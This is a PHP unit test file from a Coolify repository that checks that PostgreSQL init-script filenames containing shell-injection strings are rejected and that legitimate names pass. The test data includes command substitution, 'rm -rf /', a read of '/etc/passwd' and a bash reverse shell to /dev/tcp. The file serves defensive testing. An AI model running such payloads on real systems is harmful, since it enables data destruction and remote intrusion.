rosslh/coolify
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
coolify/tests/Unit/PostgresqlInitScriptSecurityTest.php

77 lines
2.9 KiB
PHP
Raw Normal View History

fix: enhance security by validating and escaping database names, file paths, and proxy configuration filenames to prevent command injection
2025-11-27 13:36:31 +00:00
<?php
/**
* PostgreSQL Init Script Security Tests
*
* Tests to ensure PostgreSQL init script management is protected against
* command injection attacks via malicious filenames.
*
* Related Issues: #3, #4 in security_issues.md
* Related Files: app/Livewire/Project/Database/Postgresql/General.php
*/
test('postgresql init script rejects command injection in filename with command substitution', function () {
expect(fn () => validateShellSafePath('test$(whoami)', 'init script filename'))
->toThrow(Exception::class);
});
test('postgresql init script rejects command injection with semicolon', function () {
expect(fn () => validateShellSafePath('test; rm -rf /', 'init script filename'))
->toThrow(Exception::class);
});
test('postgresql init script rejects command injection with pipe', function () {
expect(fn () => validateShellSafePath('test | whoami', 'init script filename'))
->toThrow(Exception::class);
});
test('postgresql init script rejects command injection with backticks', function () {
expect(fn () => validateShellSafePath('test`id`', 'init script filename'))
->toThrow(Exception::class);
});
test('postgresql init script rejects command injection with ampersand', function () {
expect(fn () => validateShellSafePath('test && whoami', 'init script filename'))
->toThrow(Exception::class);
});
test('postgresql init script rejects command injection with redirect operators', function () {
expect(fn () => validateShellSafePath('test > /tmp/evil', 'init script filename'))
->toThrow(Exception::class);
expect(fn () => validateShellSafePath('test < /etc/passwd', 'init script filename'))
->toThrow(Exception::class);
});
test('postgresql init script rejects reverse shell payload', function () {
expect(fn () => validateShellSafePath('test$(bash -i >& /dev/tcp/10.0.0.1/4444 0>&1)', 'init script filename'))
->toThrow(Exception::class);
});
test('postgresql init script escapes filenames properly', function () {
$filename = "init'script.sql";
$escaped = escapeshellarg($filename);
expect($escaped)->toBe("'init'\\''script.sql'");
});
test('postgresql init script escapes special characters', function () {
$filename = 'init script with spaces.sql';
$escaped = escapeshellarg($filename);
expect($escaped)->toBe("'init script with spaces.sql'");
});
test('postgresql init script accepts legitimate filenames', function () {
expect(fn () => validateShellSafePath('init.sql', 'init script filename'))
->not->toThrow(Exception::class);
expect(fn () => validateShellSafePath('01_schema.sql', 'init script filename'))
->not->toThrow(Exception::class);
expect(fn () => validateShellSafePath('init-script.sh', 'init script filename'))
->not->toThrow(Exception::class);
expect(fn () => validateShellSafePath('setup_db.sql', 'init script filename'))
->not->toThrow(Exception::class);
});
Reference in a new issue Copy permalink